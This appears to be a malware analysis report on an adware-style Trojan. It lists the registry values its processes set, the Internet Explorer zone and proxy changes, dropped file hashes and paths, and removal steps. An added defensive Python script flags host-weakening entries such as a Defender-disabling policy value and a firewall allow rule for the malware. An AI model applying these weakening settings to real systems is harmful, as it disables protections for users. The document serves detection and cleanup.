[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 90 A8 A8 34 93 CE AF 65 94 DA 06 09 05 47 93"
The process taeako.exe:372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 CD BE 57 BF 26 58 D1 B5 5E 09 03 26 10 47 F9"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\121_31]
"AMMDCS" = "1503"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
The process tae3ko.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 26 9A 4F 50 C8 5E 2F 44 B0 5B AD C9 05 D6 1A"
The process taedko.exe:1604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"AAD4DBA9766467aob23" = "60000"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"S132B7B8F1DC15ob23" = "12"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"__cxe_type" = ".10100019"
"CAD4DBA9766467bducob23" = "18000000"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"cmpcc" = "UA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"cmpcc_Expiration" = "1441945355227"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE D8 35 F4 E4 60 CD EF 9C B0 F1 DC 25 A7 F1 00"
[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"AAD4DBA9766467evaob23" = "60000"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"E419E2445BF82ob23" = "300000"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies the IE security-zone map so that all network (UNC) paths are treated as part of the Intranet zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
It also maps all sites that bypass the proxy server to the Intranet zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
It also maps all local (intranet) sites not listed in another zone to the Intranet zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
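Three groups of registry changes in this report weaken the host rather than merely install software: the Windows Defender policy value DisableAntiSpyware = 1 written by the original installer (process 924), which turns Defender off by policy; the inbound-allow FirewallRules entry and the XP-era AuthorizedApplications entry for taeako.exe in the IlejwTivc directory (process 212); and the Intranet-zone map flags set by taedko.exe:1604. The Python below is an added example, not part of the Lavasoft report or of the sample; it parses registry lines in the report's own `[key]` / `"name" = "value"` notation, decodes both firewall rule string formats (the pipe-delimited v2.x FirewallRules value and the `path:scope:Enabled:name` AuthorizedApplications value), and flags the weakening settings. The sample input is constructed from values on this page plus one benign svchost rule (with a made-up GUID) added for contrast; the finding names and the list of user-writable path markers are my assumptions.

```python
import re

# Constructed sample in the report's own notation: the firewall, Defender and
# ZoneMap entries are copied from the report above; the svchost rule (with a
# made-up GUID) is added as a benign control and is not from the report.
REGISTRY_SAMPLE = r'''
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{661088FE-EBD0-4612-8C1E-C282158A658C}" = "v2.10|Action=Allow|Active=TRUE|Dir=In|App=%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe|Name=odufaik|"
"{00000000-0000-0000-0000-000000000001}" = "v2.10|Action=Allow|Active=TRUE|Dir=In|App=%SystemRoot%\system32\svchost.exe|Svc=Dnscache|Name=assumed benign control|"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\All Users\Application Data\IlejwTivc]
"taeako.exe" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe:*:Enabled:odufaik"
[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
"ProxyBypass" = "1"
'''

KEY_RE = re.compile(r"^\[(?P<key>.+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)" = "(?P<value>.*)"$')

# Path markers for directories that are typically writable without admin rights;
# an inbound allow rule for a binary under one of them deserves a look.
# The list is an assumption for this example, not an official classification.
USER_WRITABLE = ("\\application data\\", "\\appdata\\", "\\programdata\\", "\\temp\\")
ZONEMAP_FLAGS = {"UNCAsIntranet", "ProxyBypass", "IntranetName"}


def parse_registry_lines(text):
    """Yield (key, name, value) from [key] / "name" = "value" lines."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m["key"]
            continue
        m = VALUE_RE.match(line)
        if m and key:
            yield key, m["name"], m["value"]


def parse_firewall_rule(value):
    """Decode 'v2.10|Action=Allow|Dir=In|App=...|' into a dict (first field is the version)."""
    fields = value.split("|")
    rule = {"version": fields[0]}
    for field in fields[1:]:
        if "=" in field:
            k, v = field.split("=", 1)
            rule[k] = v
    return rule


def parse_authorized_app(value):
    """Decode the XP-era 'path:scope:Enabled:name' AuthorizedApplications string.
    rsplit keeps a drive-letter colon inside the path."""
    path, scope, state, name = value.rsplit(":", 3)
    return {"App": path, "scope": scope, "state": state, "Name": name}


def in_user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)


def audit(text):
    """Return (finding, subject, detail) tuples for settings that weaken the host."""
    findings = []
    for key, name, value in parse_registry_lines(text):
        k = key.lower()
        if k.endswith("\\firewallpolicy\\firewallrules"):
            rule = parse_firewall_rule(value)
            if (rule.get("Action") == "Allow" and rule.get("Dir") == "In"
                    and in_user_writable(rule.get("App", ""))):
                findings.append(("inbound-allow-user-writable", rule["App"], rule.get("Name")))
        elif "\\authorizedapplications\\list" in k:
            app = parse_authorized_app(value)
            if app["state"].lower() == "enabled" and in_user_writable(app["App"]):
                findings.append(("legacy-authorized-app", app["App"], app["Name"]))
        elif k.endswith("\\policies\\microsoft\\windows defender"):
            if name.lower() == "disableantispyware" and value == "1":
                findings.append(("defender-disabled", key, name))
        elif k.endswith("\\internet settings\\zonemap"):
            if name in ZONEMAP_FLAGS and value == "1":
                findings.append(("ie-intranet-zone-widened", key, name))
    return findings


if __name__ == "__main__":
    for finding in audit(REGISTRY_SAMPLE):
        print("%-28s %s  (%s)" % finding)
```

The ZoneMap flags are also written by legitimate software that initializes WinINet zone settings, so on their own they are weak evidence; the firewall entries and the Defender policy value are the findings to act on, and the same parsers work on a `reg export` of the corresponding keys from a live host.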
The process taedko.exe:1988 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB A5 16 D9 CC AE C9 5D 14 0C DD F9 21 73 C3 6F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security-zone settings so that all local web nodes with no dots that do not belong to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process dag17797.exe:552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015090820150909\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CacheOptions" = "11"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CacheLimit" = "8192"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015090820150909]
"CachePrefix" = ":2015090820150909:"
"CacheRepair" = "0"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 3B 7A 7A 17 03 FA 6D 1F B5 6E BA 76 AD 76 E6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security-zone settings so that all local web nodes with no dots that do not belong to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014041520140416]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
a28a6aa25d416848937de3b817d49784 | c:\Documents and Settings\All Users\Application Data\IlejwTivc\Uninstaller.exe |
740c93fdf9dedfffd5c300aeb9c8eba5 | c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae3ko.dll |
4b0a71b036a1759bd0a9a6d8d7286470 | c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae3ko.exe |
740c93fdf9dedfffd5c300aeb9c8eba5 | c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae3kod.dll |
846c526984e6eaf579d6b26b96cbabb9 | c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae6ko.dll |
59b859426c5cb1f82ca551cdeb3a04ef | c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae6ko.exe |
846c526984e6eaf579d6b26b96cbabb9 | c:\Documents and Settings\All Users\Application Data\IlejwTivc\tae6kod.dll |
a005b797c5ebd5bf0d3bff9d9e0e36b0 | c:\Documents and Settings\All Users\Application Data\IlejwTivc\taeako.exe |
01ee425920c921ca8fbf6710bbb8e705 | c:\Documents and Settings\All Users\Application Data\IlejwTivc\taedko.exe |
44c191f29f65760a5be1f7a4c7a45c12 | c:\Documents and Settings\All Users\Application Data\IlejwTivc\taewko.exe |
98d858a74ed18756c6fa5fcb0ee620fd | c:\Documents and Settings\All Users\Application Data\IlejwTivc\utils.exe |
dae0fba97a137277189223ea9ede1175 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\tmp30731\dag17797.exe |
5264f7d6d89d1dc04955cfb391798446 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\GetVersion.dll |
b140459077c7c39be4bef249c2f84535 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\Math.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\System.dll |
7579ade7ae1747a31960a228ce02e666 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\UserInfo.dll |
5afd4a9b7e69e7c6e312b2ce4040394a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\blowfish.dll |
94ba775c8a1f4d6c9bb1966eddce22b5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\manlib.dll |
fe3f848e2a306d586ab8f5433738d8db | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\nsCBHTML5.dll |
c10e04dd4ad4277d5adc951bb331c777 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\nsDialogs.dll |
5f13dbc378792f23e598079fc1e4422b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\nsisunz.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\registry.dll |
febff2c363c7f7664687eefe8253087e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd5.tmp\serlib.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:924
taeako.exe:900
taeako.exe:2352
taeako.exe:212
taeako.exe:972
taeako.exe:948
taeako.exe:2980
taeako.exe:2644
taeako.exe:1536
taeako.exe:544
taeako.exe:436
taedko.exe:1988
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.dll (39329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\utaujte.js (1447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\Uninstaller.exe (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (101002 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\adblocker_installer__1441686123.txt (16441 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\logo.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\tmp.bpu (10136 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\jquery4toolbar.js (3312 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.dll (20416 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taedko.exe (13368 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3kod.dll (20416 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\khkiaff.js (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\TrayIcons\logo.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsislog.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\CavnNotn.dll (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (569 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6kod.dll (39329 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\utils.exe (9527 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\narhokgeb.js (6 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taewko.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\narhokgeb.js (6 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeadko.bnp (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\khkiaff.js (1856 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\utaujte.js (1447 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taewdko.bnp (6584 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\jquery4toolbar.js (3312 bytes)
%WinDir%\Tasks\Tempo Runner tae3ko.job (1352 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe (1509 bytes)
%WinDir%\Tasks\Tempo Runner tae6ko.job (8112 bytes)
%WinDir%\Tasks\Tempo Runner taedko.job (2704 bytes)
%WinDir%\Tasks\Tempo adblocker Runner.job (920 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\lgv[1].js (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cmp_ext[1].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\obbgint[1].js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58 (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ammbg[1].js (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_gb (32 bytes)
